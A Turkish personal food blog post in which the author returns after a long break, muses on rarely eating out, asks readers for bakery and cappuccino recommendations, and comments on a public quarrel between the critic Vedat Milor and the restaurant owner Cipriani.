Uzun bir aradan sonra…

Bir seneden fazladır, siteye yazı yazamadım. O yüzden de yazı bana küsmüş herhalde, nasıl başlasam, nereye bağlasam pek kestiremiyorum.
Son bir sene ne yedim, ne içtim, nerelere gittim diye başlasam, herhalde anlatacak bir şey bulamam, çünkü bir lokantaya nadiren gidiyorum. O da genelde iş yemekleri için oluyor.
Heyecanımı yitirdim, depresyondayım diye ağlamayacağım, merak etmeyin. Sadece, olur ya bazen böyle, dışarıda çok vakit geçirmek istemezsiniz. Belki “hep aynı şey, hep aynı şey” sıkıntısından, belki de “evde pişirdiğim kekler, dışarıdakinden daha güzel” inancından (ya da kandırmacasından :) ), belki de heyecan eksikliğinden, belki de gürültü, patırtı ve kalabalığa artık katlanamayışımdan. Bilmiyorum, belki de hepsi.

Hee, bazen esiyor, Kantin‘de geç bir öğle yemeği yemek istiyorum, hatta bana Ottolenghi çağrışımı yapan yeni dükkanlarını da merak ediyorum. Sonra, bir akşam, Kosinitza‘da keyifli bir yemek yemek istiyorum. Güzel bir cafe & fırın keşfetsem diyorum bazen, çok özentisin demezseniz, mesela Tartine gibi. Bir de, özellikle pazar akşamüstleri, şöyle sakin bir yerde güzel bir cappucino içebilmek istiyorum. Evet, cappucino, ne var? Komik mi?

Neyse, toparlamak gerekirse, fırın ve cappucino konusunda çok yetersizim, desteklerinizi bekliyorum.

Vedat Milor bir ay kadar önce yarı-tanrıların mekanı Cipriani’ye gidip kötü şeyler yazmış. Cipriani’nin sahibi Mösyö Cipriani de bunun üzerine Milor hakkında kötü şeyler yazmış, muhasebeci falan demiş. Milor bunun üzerine dalga geçer gibi pastırma reklamına çıkmış. Ben burada üç şeyi anlamadım:

1) Cipriani madem bir kedinin bacağını ayırma ihtiyacı duydu, neden Milor’u seçti? Defne Hanım taa vaktiyle Milor’un inandırıcılığını yitirdiğini söylemişti zaten (13 Ocak tarihli yazısı).

2) Cipriani’nin dediğine göre Milor’un risottoyu “salata gibi” diye tarif etmesi ne demek? Gerçekten anlamadım. Sordum, soruşturdum, anlayan bulamadım.

3) Üstüne titrediğiniz blogosferde bununla ilgili kaydadeğer iki kelam neden yok?!?
